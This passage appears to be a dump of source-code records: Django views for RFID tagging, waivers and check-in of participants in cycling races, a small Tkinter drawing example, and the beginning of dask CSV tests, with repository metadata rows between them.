	speed_table = [ [ speed_rc[(row, col)] for col in range(col_max) ] for row in range(row_max) ]
	speed_table.reverse()
	return render( request, 'participant_est_speed_change.html', locals() )
#-----------------------------------------------------------------------
@autostrip
class ParticipantWaiverForm( Form ):
	# Two-button confirmation form (signed / not signed).  No input fields.
	def __init__(self, *args, **kwargs):
		super(ParticipantWaiverForm, self).__init__(*args, **kwargs)
		self.helper = FormHelper( self )
		self.helper.form_action = '.'
		self.helper.form_class = 'navbar-form navbar-left'
		button_args = [
			Submit( 'ok-submit', _('Waiver Correct and Signed'), css_class = 'btn btn-success' ),
			Submit( 'not-ok-submit', _('Waiver Incorrect or Unsigned'), css_class = 'btn btn-danger' ),
			CancelButton(),
		]
		self.helper.layout = Layout(
			Row(button_args[0]),
			Row(HTML(' ')),
			Row(button_args[1]),
			Row(HTML(' ')),
			Row(button_args[2]),
		)
@access_validation()
def ParticipantWaiverChange( request, participantId ):
	"""Record whether the participant's waiver is correctly signed."""
	participant = get_participant( participantId )
	if request.method != 'POST':
		# GET: show the two-button confirmation page.
		form = ParticipantWaiverForm()
		return render( request, 'participant_waiver_change.html', locals() )
	if 'ok-submit' in request.POST:
		participant.sign_waiver_now()
	elif 'not-ok-submit' in request.POST:
		participant.unsign_waiver_now()
	return HttpResponseRedirect(getContext(request,'cancelUrl'))
#-----------------------------------------------------------------------
@autostrip
class ParticipantTagForm( Form ):
	# RFID chip-tag management form: check, write, auto-generate, or associate
	# a tag with the rider.  Button indexes are referenced positionally in the
	# layout below.
	tag = forms.CharField( required = False, label = _('Tag') )
	make_this_existing_tag = forms.BooleanField( required = False, label = _('Rider keeps tag for other races') )
	rfid_antenna = forms.ChoiceField( choices = ((0,_('None')), (1,'1'), (2,'2'), (3,'3'), (4,'4') ), label = _('RFID Antenna') )
	def __init__(self, *args, **kwargs):
		super(ParticipantTagForm, self).__init__(*args, **kwargs)
		self.helper = FormHelper( self )
		self.helper.form_action = '.'
		self.helper.form_class = 'navbar-form navbar-left'
		button_args = [
			Submit( 'ok-submit', _('Update Tag in Database'), css_class = 'btn btn-primary' ),
			CancelButton(),
			Submit( 'auto-generate-tag-submit', _('Auto Generate Tag Only - Do Not Write'), css_class = 'btn btn-primary' ),
			Submit( 'write-tag-submit', _('Write Existing Tag'), css_class = 'btn btn-primary' ),
			Submit( 'auto-generate-and-write-tag-submit', _('Auto Generate and Write Tag'), css_class='btn btn-success' ),
			Submit( 'check-tag-submit', _('Check Tag'), css_class = 'btn btn-lg btn-block btn-success' ),
			Submit( 'associate-existing-tag-submit', _('Update Database from Tag'), css_class='btn btn-primary' ),
		]
		self.helper.layout = Layout(
			Row( Col(button_args[5], 8), Col(button_args[1], 4) ),
			Row( HTML('<hr style="margin:32px"/>') ),
			Row(
				Col( Field('tag', rows='2', cols='60'), 5 ),
				Col( Field('make_this_existing_tag'), 4 ),
				Col( Field('rfid_antenna'), 3 ),
			),
			HTML( '<br/>' ),
			Row(
				button_args[4], HTML( ' ' * 5 ),
				button_args[3], HTML( ' ' * 5 ),
				button_args[6],
			),
			HTML( '<br/>' * 2 ),
			Row(
				button_args[2],
			),
			HTML( '<br/>' * 2 ),
			Row(
				button_args[0],
				HTML( ' ' * 5 ),
				button_args[1],
			),
		)
def get_bits_from_hex( s ):
	"""Return the number of bits encoded by hex string *s* (4 per character; None/empty -> 0)."""
	return 0 if not s else 4 * len(s)
@access_validation()
def ParticipantTagChange( request, participantId ):
	# RFID tag workflow for a participant: validate a tag against the reader,
	# auto-generate a tag, write a tag to the chip, or associate a read tag
	# with the rider.  Every failure path collects (title, messages) pairs in
	# status_entries and renders rfid_write_status.html.
	participant = get_participant( participantId )
	competition = participant.competition
	license_holder = participant.license_holder
	system_info = SystemInfo.get_singleton()
	rfid_antenna = int(request.session.get('rfid_antenna', 0))
	validate_success = False
	status = True
	status_entries = []
	# --- validation helpers: each returns False and appends an explanation on failure ---
	def check_antenna( rfid_antenna ):
		if not rfid_antenna:
			status_entries.append(
				(_('RFID Antenna Configuration'), (
					_('RFID Antenna must be specified.'),
					_('Please specify the RFID Antenna.'),
				)),
			)
			return False
		return True
	def check_empty_tag( tag ):
		if not tag:
			status_entries.append(
				(_('Empty Tag'), (
					_('Cannot validate an empty Tag.'),
					_('Please generate a Tag, or press Cancel.'),
				)),
			)
			return False
		return True
	def check_unique_tag( tag, make_this_existing_tag ):
		# The tag must not belong to another LicenseHolder (when making it
		# permanent) nor to another Participant in this competition.
		if make_this_existing_tag:
			lh = LicenseHolder.objects.filter( existing_tag=tag ).exclude( pk=license_holder.pk ).first()
			if lh:
				status_entries.append(
					(_('Duplicate Tag'), (
						_('Tag already in use by LicenseHolder.'),
						lh.__repr__(),
					)),
				)
				return False
		p = Participant.objects.filter( competition=competition, tag=tag ).exclude( license_holder=license_holder ).first()
		if p:
			status_entries.append(
				(_('Duplicate Tag'), (
					_('Tag already in use by Participant.'),
					p.license_holder.__repr__(),
				)),
			)
			return False
		return True
	def check_one_tag_read( tags ):
		# Exactly one tag must be in the antenna field for an unambiguous read.
		if not tags:
			status_entries.append(
				(_('Tag Read Failure'), (
					_('No tags read. Verify antenna number and that tag is close to antenna.'),
				)),
			)
			return False
		if len(tags) > 1:
			status_entries.append(
				(_('Multiple Tags Read'), [add_name_to_tag(competition, t) for t in tags] ),
			)
			return False
		return True
	def participant_save( particiant ):
		# NOTE(review): the parameter name is misspelled and unused - the body
		# saves the enclosing "participant" closure variable.
		try:
			participant.auto_confirm().save()
		except IntegrityError as e:
			# Report the error - probably a non-unique field.
			has_error, conflict_explanation, conflict_participant = participant.explain_integrity_error()
			status_entries.append(
				(_('Participant Save Failure'), (
					u'{}'.format(e),
				)),
			)
			return False
		return True
	if request.method == 'POST':
		form = ParticipantTagForm( request.POST )
		if form.is_valid():
			tag = form.cleaned_data['tag'].strip().upper()
			make_this_existing_tag = form.cleaned_data['make_this_existing_tag']
			rfid_antenna = request.session['rfid_antenna'] = int(form.cleaned_data['rfid_antenna'])
			if 'check-tag-submit' in request.POST:
				# Read a tag from the antenna and compare it to the entered tag.
				status &= check_antenna(rfid_antenna) and check_empty_tag(tag)
				if status:
					status, response = ReadTag(rfid_antenna)
					if not status:
						status_entries = [
							(_('Tag Read Failure'), response.get('errors',[]) ),
						]
					else:
						tags = response.get('tags', [])
						status &= check_one_tag_read( tags )
						if status:
							tag_read = tags[0]
							if tag_read == tag:
								validate_success = True
								participant.tag_checked = True
								# Fallthrough so that the tag format is checked.
							else:
								status = False
								status_entries.append(
									(_('Tag Validation Failure'), [tag_read, _('***DOES NOT MATCH***'), tag] ),
								)
								participant.tag_checked = False
				status &= participant_save( participant )
			elif 'auto-generate-tag-submit' in request.POST or 'auto-generate-and-write-tag-submit' in request.POST:
				participant.tag_checked = False
				# Reuse the rider's existing tag when configured and the bit-length
				# matches the system's tag size; otherwise generate a fresh unique tag.
				if ( competition.use_existing_tags and
						system_info.tag_creation == 0 and get_bits_from_hex(license_holder.existing_tag) == system_info.tag_bits):
					tag = license_holder.existing_tag
				else:
					tag = license_holder.get_unique_tag( system_info )
			elif 'associate-existing-tag-submit' in request.POST:
				# Read a tag from the antenna and store it against this rider.
				status &= check_antenna(rfid_antenna)
				if status:
					status, response = ReadTag(rfid_antenna)
					if not status:
						status_entries = [
							(_('Tag Read Failure'), response.get('errors',[]) ),
						]
					else:
						tags = response.get('tags', [])
						status &= check_one_tag_read( tags )
						if status:
							tag = tags[0]
							status &= check_unique_tag( tag, make_this_existing_tag )
							if status:
								participant.tag_checked = True
			# Common validation for all submit paths: non-empty, and hex-only if required.
			if status:
				status &= check_empty_tag( tag )
			if status and system_info.tag_all_hex and not utils.allHex(tag):
				status = False
				status_entries.append(
					(_('Non-Hex Characters in Tag'), (
						_('All Tag characters must be hexadecimal ("0123456789ABCDEF").'),
						_('Please change the Tag to all hexadecimal.'),
					)),
				)
			if not status:
				participant.tag_checked = False
				participant_save( participant )
				return render( request, 'rfid_write_status.html', locals() )
			participant.tag = tag
			status &= participant_save( participant )
			if not status:
				return render( request, 'rfid_write_status.html', locals() )
			if make_this_existing_tag and license_holder.existing_tag != tag:
				license_holder.existing_tag = tag
				try:
					license_holder.save()
				except Exception as e:
					# Report the error - probably a non-unique field.
					status = False
					status_entries.append(
						(
							format_lazy(u'{}: {}', _('LicenseHolder'), _('Existing Tag Save Exception:')),
							(u'{}'.format(e),)
						),
					)
					return render( request, 'rfid_write_status.html', locals() )
			if 'write-tag-submit' in request.POST or 'auto-generate-and-write-tag-submit' in request.POST:
				# Physically write the tag to the chip via the antenna.
				status &= check_antenna( rfid_antenna )
				if status:
					status, response = WriteTag(tag, rfid_antenna)
					if not status:
						participant.tag_checked = False
						participant_save( participant )
						status_entries = [
							(_('Tag Write Failure'), response.get('errors',[]) ),
						]
					else:
						participant.tag_checked = True
						status &= participant_save( participant )
				if not status:
					return render( request, 'rfid_write_status.html', locals() )
				# if status: fall through to ok-submit case.
			# ok-submit
			if 'auto-generate-tag-submit' in request.POST:
				return HttpResponseRedirect(getContext(request,'path'))
			return HttpResponseRedirect(getContext(request,'cancelUrl'))
	else:
		form = ParticipantTagForm( initial = dict(tag=participant.tag, rfid_antenna=rfid_antenna, make_this_existing_tag=competition.use_existing_tags) )
	return render( request, 'participant_tag_change.html', locals() )
#-----------------------------------------------------------------------
@autostrip
class ParticipantSignatureForm( Form ):
	# Signature capture form: renders either a jSignature touch-screen canvas
	# or a plain text field depending on is_jsignature.
	signature = forms.CharField( required = False, label = _('Signature') )
	def __init__(self, *args, **kwargs):
		# is_jsignature is popped before calling super so Django's Form does not see it.
		is_jsignature = kwargs.pop( 'is_jsignature', True )
		super(ParticipantSignatureForm, self).__init__(*args, **kwargs)
		self.helper = FormHelper( self )
		self.helper.form_action = '.'
		self.helper.form_id = 'id_signature_form'
		self.helper.form_class = 'navbar-form navbar-left'
		if is_jsignature:
			button_args = [
				Submit( 'ok-submit', format_lazy( u'{}{}{}', ' '*10, _('OK'), ' '*10), css_class = 'btn btn-success', style='font-size:200%' ),
				CancelButton( style='font-size:200%' ),
				HTML(u'<button class="btn btn-warning hidden-print" onClick="reset_signature()">{}</button>'.format(_('Reset'))),
			]
		else:
			button_args = [
				HTML(' '*24),
				CancelButton( style='font-size:150%' )
			]
		if is_jsignature:
			self.helper.layout = Layout(
				Container(
					Row( Col(Field('signature'), 12) ),
					Row( Col(Div(id="id_signature_canvas"), 12) ),
					Row(
						Col(button_args[0],4),
						Col(button_args[1],4),
						Col(button_args[2],4),
					),
				)
			)
		else:
			self.helper.layout = Layout(
				Container(
					Row( Col( Field( 'signature' ), 12) ),
					Row( Div( Div(*button_args, css_class='row'), css_class='col-md-12 text-center' ) ),
				)
			)
@access_validation()
def ParticipantSignatureChange( request, participantId ):
	# Capture the rider's signature, via the touch-screen widget (jSignature)
	# or plain typed text, depending on the session preference.
	participant = get_participant( participantId )
	signature_with_touch_screen = int(request.session.get('signature_with_touch_screen', True))
	if request.method == 'POST':
		form = ParticipantSignatureForm( request.POST, is_jsignature=signature_with_touch_screen )
		if form.is_valid():
			signature = form.cleaned_data['signature']
			signature = signature.strip()
			if not signature:
				# An empty signature is not accepted: redisplay the page.
				return HttpResponseRedirect(getContext(request,'path'))
			participant.signature = signature
			participant.auto_confirm().save()
		return HttpResponseRedirect(getContext(request,'cancelUrl'))
	else:
		form = ParticipantSignatureForm( is_jsignature=signature_with_touch_screen )
	if signature_with_touch_screen:
		return render( request, 'participant_jsignature_change.html', locals() )
	else:
		return render( request, 'participant_signature_change.html', locals() )
@access_validation()
def SetSignatureWithTouchScreen( request, use_touch_screen ):
	"""Persist the operator's preference for touch-screen signature capture in the session."""
	request.session['signature_with_touch_screen'] = (int(use_touch_screen) != 0)
	return HttpResponseRedirect(getContext(request,'cancelUrl'))
#-----------------------------------------------------------------------
@access_validation()
def ParticipantBarcodeAdd( request, competitionId ):
	# Add/find a participant by scanning a license barcode.
	# One match -> edit that participant; no match or multiple matches -> error
	# page; known license holder not yet entered -> confirmation page.
	competition = get_object_or_404( Competition, pk=competitionId )
	add_by_barcode = True
	if request.method == 'POST':
		form = BarcodeScanForm( request.POST, hide_cancel_button=True )
		if form.is_valid():
			scan = form.cleaned_data['scan'].strip()
			if not scan:
				# Empty scan: just redisplay the scan page.
				return HttpResponseRedirect(getContext(request,'path'))
			license_holder, participants = participant_key_filter( competition, scan, False )
			license_holders = []	# Required for participant_scan_error.
			if not license_holder:
				return render( request, 'participant_scan_error.html', locals() )
			if len(participants) == 1:
				return HttpResponseRedirect(pushUrl(request,'ParticipantEdit',participants[0].id))
			if len(participants) > 1:
				return render( request, 'participant_scan_error.html', locals() )
			return HttpResponseRedirect(pushUrl(request,'LicenseHolderAddConfirm', competition.id, license_holder.id))
	else:
		form = BarcodeScanForm( hide_cancel_button=True )
	return render( request, 'participant_scan_form.html', locals() )
# Disabled legacy error views, deliberately kept for reference as a module-level
# string literal; this block has no effect at runtime.
'''
@access_validation()
def ParticipantNotFoundError( request, competitionId ):
	competition = get_object_or_404( Competition, pk=competitionId )
	return render( request, 'participant_not_found_error.html', locals() )
@access_validation()
def ParticipantMultiFoundError( request, competitionId ):
	competition = get_object_or_404( Competition, pk=competitionId )
	return render( request, 'participant_multi_found_error.html', locals() )
'''
#-----------------------------------------------------------------------
@access_validation()
def ParticipantRfidAdd( request, competitionId, autoSubmit=False ):
	# Add/find a participant by reading an RFID tag from the selected antenna.
	# Mirrors ParticipantBarcodeAdd, but a successful single match also marks
	# the participant's tag as checked.
	competition = get_object_or_404( Competition, pk=competitionId )
	rfid_antenna = int(request.session.get('rfid_antenna', 0))
	status = True
	status_entries = []
	rfid_tag = None
	rfid_tags = []
	add_by_rfid = True
	if request.method == 'POST':
		form = RfidScanForm( request.POST, hide_cancel_button=True )
		if form.is_valid():
			# Remember the chosen antenna for subsequent reads.
			request.session['rfid_antenna'] = rfid_antenna = int(form.cleaned_data['rfid_antenna'])
			if not rfid_antenna:
				status = False
				status_entries.append(
					(_('RFID Antenna Configuration'), (
						_('RFID Antenna for Tag Read must be specified.'),
						_('Please specify the RFID Antenna.'),
					)),
				)
			else:
				status, response = ReadTag(rfid_antenna)
				# DEBUG DEBUG
				#status, response = True, {'rfid_tags': ['A7A2102303']}
				if not status:
					status_entries.append(
						(_('Tag Read Failure'), response.get('errors',[]) ),
					)
				else:
					rfid_tags = response.get('tags', [])
					try:
						rfid_tag = rfid_tags[0]
					except (AttributeError, IndexError) as e:
						status = False
						status_entries.append(
							(_('Tag Read Failure'), [e] ),
						)
					# Exactly one tag must be in the antenna field for an unambiguous read.
					if rfid_tag and len(rfid_tags) > 1:
						status = False
						status_entries.append(
							(_('Multiple Tags Read'), rfid_tags ),
						)
			if not status:
				return render( request, 'participant_scan_rfid.html', locals() )
			license_holder, participants = participant_key_filter( competition, rfid_tag, False )
			license_holders = []	# Required for participant_scan_error.
			if not license_holder:
				return render( request, 'participant_scan_error.html', locals() )
			if len(participants) == 1:
				# Single match: the successful read also confirms the tag.
				participants[0].set_tag_checked()
				return HttpResponseRedirect(pushUrl(request,'ParticipantEdit',participants[0].id))
			if len(participants) > 1:
				return render( request, 'participant_scan_error.html', locals() )
			return HttpResponseRedirect(pushUrl(request,'LicenseHolderAddConfirm', competition.id, license_holder.id, 1))
	else:
		form = RfidScanForm( initial=dict(rfid_antenna=rfid_antenna), hide_cancel_button=True )
	return render( request, 'participant_scan_rfid.html', locals() )
#-----------------------------------------------------------------------
@autostrip
class ParticipantConfirmForm( Form ):
    """
    Form to confirm a Participant's details at check-in.

    Mixes editable LicenseHolder fields (name, birth date, nation code,
    gender, UCIID, license code) with read-only Participant fields
    (category, team) that are changed on their own sub-pages via the
    Change/Lookup buttons handled by dispatch().
    """
    participant_id = forms.IntegerField()
    last_name = forms.CharField( label = _('Last Name') )
    first_name = forms.CharField( required=False, label = _('First Name') )
    date_of_birth = forms.DateField( label = _('Date of Birth'))
    nation_code = forms.CharField( max_length=3, required=False, label=_('Nation Code'), widget=forms.TextInput(attrs={'size': 3}) )
    gender = forms.ChoiceField( required=False, choices = ((0, _('Men')), (1, _('Women'))), label=_('Gender') )
    uci_id = forms.CharField( required=False, label=_('UCIID') )
    license_code = forms.CharField( required=False, label=_('License Code') )
    category_name = forms.CharField( required=False, label = _('Category') )
    team_name = forms.CharField( required=False, label = _('Team') )
    confirmed = forms.BooleanField( required=False, label = _('Confirmed') )
    # Which cleaned fields persist on the LicenseHolder vs. the Participant.
    license_holder_fields = ('last_name', 'first_name', 'date_of_birth', 'nation_code', 'gender', 'uci_id', 'license_code')
    participant_fields = ('confirmed','category_name', 'team_name')

    def save( self, request ):
        """Write the cleaned form data back to the LicenseHolder and Participant."""
        participant = get_object_or_404( Participant, pk=self.cleaned_data['participant_id'] )
        license_holder = participant.license_holder
        for a in self.license_holder_fields:
            setattr( license_holder, a, self.cleaned_data[a] )
        license_holder.save()
        for a in self.participant_fields:
            # The *_name fields are read-only displays; only 'confirmed' is saved here.
            if not a.endswith('_name'):
                setattr( participant, a, self.cleaned_data[a] )
        participant.save()

    @classmethod
    def get_initial( cls, participant ):
        """Build the form's initial-data dict from an existing Participant."""
        license_holder = participant.license_holder
        initial = {}
        for a in cls.license_holder_fields:
            initial[a] = getattr( license_holder, a )
        for a in cls.participant_fields:
            if not a.endswith('_name'):
                initial[a] = getattr( participant, a )
        initial['category_name'] = participant.category_name
        initial['team_name'] = participant.team_name
        initial['participant_id'] = participant.id
        return initial

    def changeCategoryCB( self, request ):
        # Navigate to the category-change sub-page for this participant.
        participant = get_object_or_404( Participant, pk=self.cleaned_data['participant_id'] )
        return HttpResponseRedirect( pushUrl(request, 'ParticipantCategoryChange', participant.id) )

    def changeTeamCB( self, request ):
        # Navigate to the team-change sub-page for this participant.
        participant = get_object_or_404( Participant, pk=self.cleaned_data['participant_id'] )
        return HttpResponseRedirect( pushUrl(request, 'ParticipantTeamChange', participant.id) )

    def changeNationCodeCB( self, request ):
        # Navigate to the nation-code lookup sub-page for the license holder.
        participant = get_object_or_404( Participant, pk=self.cleaned_data['participant_id'] )
        return HttpResponseRedirect( pushUrl(request, 'LicenseHolderNationCodeChange', participant.license_holder.id) )

    def dispatch( self, request ):
        """Save the form, then invoke the callback of whichever extra button was pressed.

        Returns None when no additional button matched the POST data.
        """
        for ab in self.additional_buttons:
            # ab = (name, label, css_class, callback); ab[3:] guards for a callback entry.
            if ab[3:] and ab[0] in request.POST:
                self.save( request )
                return ab[3]( request )

    def submit_button( self, ab ):
        # Render an additional-button tuple as a crispy Submit (hidden when printing).
        name, value, cls = ab[:3]
        return Submit(name, value, css_class = cls + ' hidden-print')

    def __init__(self, *args, **kwargs):
        participant = kwargs.pop( 'participant', None )
        competition = participant.competition
        license_holder = participant.license_holder
        super(ParticipantConfirmForm, self).__init__(*args, **kwargs)
        # Category and team are edited via their own pages, not inline.
        self.fields['category_name'].widget.attrs['readonly'] = True
        self.fields['team_name'].widget.attrs['readonly'] = True
        self.helper = FormHelper( self )
        self.helper.form_action = '.'
        self.helper.form_class = 'form-inline search'
        button_args = [
            Submit( 'save-submit', _('Save'), css_class = 'btn btn-primary' ),
            Submit( 'ok-submit', _('OK'), css_class = 'btn btn-primary' ),
            CancelButton(),
        ]
        # (name, label, css class, callback) tuples consumed by dispatch().
        change_team = ('change-team-submit', _('Change'), 'btn btn-primary', self.changeTeamCB)
        change_nation_code = ('change-nation-code-submit', _('Lookup'), 'btn btn-primary', self.changeNationCodeCB)
        change_category = ('change-category-submit', _('Change'), 'btn btn-primary', self.changeCategoryCB)
        self.additional_buttons = (change_team, change_nation_code, change_category)
        nation_code_error = license_holder.nation_code_error
        if not license_holder.uci_id:
            uci_id_error = u'missing'
        else:
            uci_id_error = license_holder.uci_id_error

        def warning_html( warning ):
            # Inline warning icon followed by the warning text; empty string if no warning.
            return u'<img src="{}" style="width:20px;height:20px;"/>{}'.format(static('images/warning.png'), warning) if warning else u''

        self.helper.layout = Layout(
            Row( button_args[0], HTML(' '*8), button_args[1], HTML(' '*8), button_args[2] ),
            Row( HTML('<hr/>') ),
            Row( HTML('<div style="font-size: 125%;">'), Field('confirmed'), HTML('</div>') ),
            Row(
                Field('last_name', size=50, css_class='no-highlight'),
                Field('first_name', size=20, css_class='no-highlight'),
                Field('date_of_birth', size=10, css_class='no-highlight'),
            ),
            Row(
                HTML(warning_html(nation_code_error)),
                HTML(flag_html(license_holder.nation_code) + ' ' + ioc_country.get(license_holder.nation_code, u'')),
                FieldWithButtons(Field('nation_code', css_class='no-highlight'), self.submit_button(change_nation_code) ),
                HTML(' '*2), Field('gender', css_class='no-highlight'),
                HTML(' '*2), FieldWithButtons(Field('team_name', size=40, css_class='no-highlight'), self.submit_button(change_team) ),
            ),
            Row(
                HTML(warning_html(uci_id_error)),
                Field('uci_id', size=15, css_class='no-highlight'), Field('license_code', css_class='no-highlight'),
                HTML(' '*2), FieldWithButtons(Field('category_name', size=30, css_class='no-highlight'), self.submit_button(change_category) ),
            ),
            Field('participant_id', type='hidden'),
        )
@access_validation()
def ParticipantConfirm( request, participantId ):
    """
    Display/process the participant-confirmation form.

    POST buttons: 'save-submit' saves and redisplays; 'ok-submit' saves,
    marks the participant confirmed and pops back; the Change/Lookup
    buttons are routed through form.dispatch().
    """
    participant = get_object_or_404( Participant, pk=participantId )
    # competition_age is picked up by the template via locals().
    competition_age = participant.competition.competition_age( participant.license_holder )
    if request.method == 'POST':
        form = ParticipantConfirmForm( request.POST, participant=participant )
        if form.is_valid():
            form.save( request )
            if 'save-submit' in request.POST:
                return HttpResponseRedirect( '.' )
            if 'ok-submit' in request.POST:
                participant.confirmed = True
                participant.save()
                return HttpResponseRedirect( getContext(request,'cancelUrl') )
            # Otherwise one of the additional Change/Lookup buttons was pressed.
            return form.dispatch( request )
    else:
        form = ParticipantConfirmForm( initial=ParticipantConfirmForm.get_initial(participant), participant=participant )
    return render( request, 'participant_confirm.html', locals() )
#--------------------------------------------------------------------------------------
@autostrip
class ParticipantNotFoundForm( Form ):
    """
    Search form (last name, gender, date of birth) shown when a participant
    could not be found.  After a POST a 'Create New License Holder' button
    is added so the user can register a brand-new rider.
    """
    last_name = forms.CharField( label = _('Last Name') )
    gender = forms.ChoiceField( choices = ((0, _('Men')), (1, _('Women'))) )
    date_of_birth = forms.DateField( label = _('Date of Birth') )

    def __init__(self, *args, **kwargs):
        # Pop custom kwargs before Form.__init__ sees them.
        from_post = kwargs.pop('from_post', False)
        has_matches = kwargs.pop('has_matches', False)  # accepted but not used in the layout
        super(ParticipantNotFoundForm, self).__init__(*args, **kwargs)
        self.helper = FormHelper( self )
        self.helper.form_action = '.'
        self.helper.form_class = 'form-inline search'
        button_args = [Submit( 'search-submit', _('Search'), css_class = 'btn btn-primary' )]
        if from_post:
            # Only offer "create new" after an actual search round-trip.
            button_args.append( Submit( 'new-submit', _('Not Found - Create New License Holder'), css_class = 'btn btn-success' ) )
        button_args.append( CancelButton() )
        self.helper.layout = Layout(
            Row(
                Field('last_name', size=44),
                Field('gender'),
                Field('date_of_birth'),
            ),
            Row( *button_args ),
        )
@access_validation()
def ParticipantNotFound( request, competitionId ):
    """
    Search for a LicenseHolder by last name, gender and birth date.

    Shows exact and broader name matches when found; otherwise (or when the
    user presses 'new-submit') creates a minimal new LicenseHolder plus a
    Participant and redirects to their edit pages.
    """
    competition = get_object_or_404( Competition, pk=competitionId )
    has_matches = False
    matches = []
    # Last search criteria are kept in the session so the form can be
    # re-populated when the user returns to this page.
    key = 'participant_not_found'

    def set_form_fields( last_name, gender, date_of_birth ):
        request.session[key] = {'last_name':last_name, 'gender':gender, 'date_of_birth':date_of_birth.strftime('%Y-%m-%d')}

    def get_form_fields():
        fields = request.session.get(key, {})
        try:
            # Stored as 'YYYY-MM-DD'; convert back to a date instance.
            fields['date_of_birth'] = datetime.date( *[int(f) for f in fields['date_of_birth'].split('-')] )
        except KeyError:
            # No previous search in this session.
            pass
        return fields

    if request.method == 'POST':
        form = ParticipantNotFoundForm( request.POST, from_post=True )
        if form.is_valid():
            last_name = form.cleaned_data['last_name']
            # Capitalize the first letter only; leave the rest untouched.
            last_name = last_name[:1].upper() + last_name[1:]
            gender = int(form.cleaned_data['gender'])
            date_of_birth = form.cleaned_data['date_of_birth']
            set_form_fields( last_name, gender, date_of_birth )
            if 'search-submit' in request.POST:
                # Exact gender+dob+name-prefix matches first, then broader name-only hits.
                matches = LicenseHolder.objects.filter( gender=gender, date_of_birth=date_of_birth, search_text__startswith=utils.get_search_text(last_name) )
                secondary_matches = LicenseHolder.objects.filter( search_text__contains=utils.get_search_text(last_name) ).exclude( pk__in=matches.values_list('pk',flat=True) )
                has_matches = matches.exists() or secondary_matches.exists()
                if has_matches:
                    form = ParticipantNotFoundForm( initial={'last_name':last_name, 'gender':gender, 'date_of_birth':date_of_birth}, has_matches=has_matches, from_post=True )
                    return render( request, 'participant_not_found.html', locals() )
            if 'new-submit' in request.POST or not has_matches:
                # Create a minimal LicenseHolder (first name defaults to the first
                # letter of the last name) and register them for this competition.
                license_holder = LicenseHolder( last_name=last_name, first_name=last_name[:1], gender=gender, date_of_birth=date_of_birth )
                license_holder.save()
                participant = Participant( competition=competition, license_holder=license_holder )
                participant.save()
                return HttpResponseRedirect( getContext(request,'cancelUrl') +
                    'ParticipantEdit/{}/'.format(participant.id) +
                    'LicenseHolderEdit/{}/'.format(license_holder.id)
                )
    else:
        form = ParticipantNotFoundForm( initial=get_form_fields() )
    return render( request, 'participant_not_found.html', locals() )
@access_validation()
def ParticipantLicenseHolderFound( request, competitionId, licenseHolderId ):
    """Redirect a found LicenseHolder into the add-to-competition flow."""
    competition = get_object_or_404( Competition, pk=competitionId )
    license_holder = get_object_or_404( LicenseHolder, pk=licenseHolderId )
    target = '{}ParticipantAddToCompetition/{}/{}/'.format(
        getContext(request, 'pop2Url'), competition.id, license_holder.id,
    )
    return HttpResponseRedirect( target )
| [
"[email protected]"
] | |
d6e53802abe18fd58b79466f4e5b581f8311cc8f | b864b992187e2e1c5c8da6fdabeeab5040058fe9 | /Python Example/python 100 examples/064.py | 5d0b0242ccab80007fa668c36eec6b037ee30270 | [] | no_license | Mr-Phoebe/ProgramLanguage | 5384afeef20c8a12cd89cf3720beb0337bd38fc9 | 1588aea62e15304339efb73d55653be1b4e57156 | refs/heads/master | 2023-02-06T11:59:06.272680 | 2023-02-06T04:00:14 | 2023-02-06T04:00:14 | 65,252,634 | 52 | 37 | null | null | null | null | GB18030 | Python | false | false | 630 | py | # -*- coding: UTF-8 -*-
'''
题目:利用ellipse and rectangle 画图。
1.程序分析:
2.程序源代码:
'''
if __name__ == '__main__':
from Tkinter import *
canvas = Canvas(width = 400,height = 600,bg = 'white')
left = 20
right = 50
top = 50
num = 15
for i in range(num):
canvas.create_oval(250 - right,250 - left,250 + right,250 + left)
canvas.create_oval(250 - 20,250 - top,250 + 20,250 + top)
canvas.create_rectangle(20 - 2 * i,20 - 2 * i,10 * (i + 2),10 * ( i + 2))
right += 5
left += 5
top += 10
canvas.pack()
mainloop()
| [
"[email protected]"
] | |
84d1b66a1d65710dbf72630462b771d0caabbd2d | 5a1e5603a42ff27e648fad307d60957cb95f0185 | /dask/dataframe/tests/test_csv.py | 5e6550be7b23c583897a4f98ca267e45c276d05a | [
"LicenseRef-scancode-unknown-license-reference",
"BSD-3-Clause"
] | permissive | jseabold/dask | 1937931e7951f776b253432f6b5beedee90892a0 | f6332dec1ead4034540bc2c3c1010a9783099752 | refs/heads/master | 2021-01-23T04:23:10.852740 | 2016-04-29T00:14:34 | 2016-04-29T00:14:34 | 57,442,996 | 0 | 0 | null | 2016-04-30T13:29:31 | 2016-04-30T13:29:30 | Python | UTF-8 | Python | false | false | 6,358 | py | from __future__ import print_function, division, absolute_import
from io import BytesIO
import pytest
pd = pytest.importorskip('pandas')
dd = pytest.importorskip('dask.dataframe')
from toolz import partition_all, valmap, partial
from dask import compute
from dask.async import get_sync
from dask.dataframe.csv import read_csv_from_bytes, bytes_read_csv, read_csv
from dask.dataframe.utils import eq
from dask.utils import filetexts, filetext
# Run every compute() in these tests on the synchronous single-threaded
# scheduler so failures surface as plain tracebacks.
compute = partial(compute, get=get_sync)

# Three in-memory CSV "files": a normal one, an empty one (header only),
# and another normal one.  Keys sort in date order.
files = {'2014-01-01.csv': (b'name,amount,id\n'
                            b'Alice,100,1\n'
                            b'Bob,200,2\n'
                            b'Charlie,300,3\n'),
         '2014-01-02.csv': (b'name,amount,id\n'),
         '2014-01-03.csv': (b'name,amount,id\n'
                            b'Dennis,400,4\n'
                            b'Edith,500,5\n'
                            b'Frank,600,6\n')}

# Shared header line (including trailing newline) of all the files above.
header = files['2014-01-01.csv'].split(b'\n')[0] + b'\n'

# The concatenation of all files as a pandas DataFrame; used as the
# expected result throughout the tests below.
expected = pd.concat([pd.read_csv(BytesIO(files[k])) for k in sorted(files)])
def test_bytes_read_csv():
    """bytes_read_csv parses a raw byte blob into a pandas DataFrame."""
    data = files['2014-01-01.csv']
    frame = bytes_read_csv(data, b'', {})
    assert list(frame.columns) == ['name', 'amount', 'id']
    assert len(frame) == 3
    assert frame.id.sum() == 6
def test_bytes_read_csv_kwargs():
    """read_csv keyword arguments such as usecols are honored."""
    frame = bytes_read_csv(files['2014-01-01.csv'], b'', {'usecols': ['name', 'id']})
    assert list(frame.columns) == ['name', 'id']
def test_bytes_read_csv_dtype_coercion():
    """An explicit dtype mapping overrides the inferred column dtype."""
    frame = bytes_read_csv(files['2014-01-01.csv'], b'', {}, {'amount': 'float'})
    assert frame.amount.dtype == 'float'
def test_bytes_read_csv_with_header():
    """The header line may be supplied separately from the body bytes."""
    raw = files['2014-01-01.csv']
    first_line, body = raw.split(b'\n', 1)
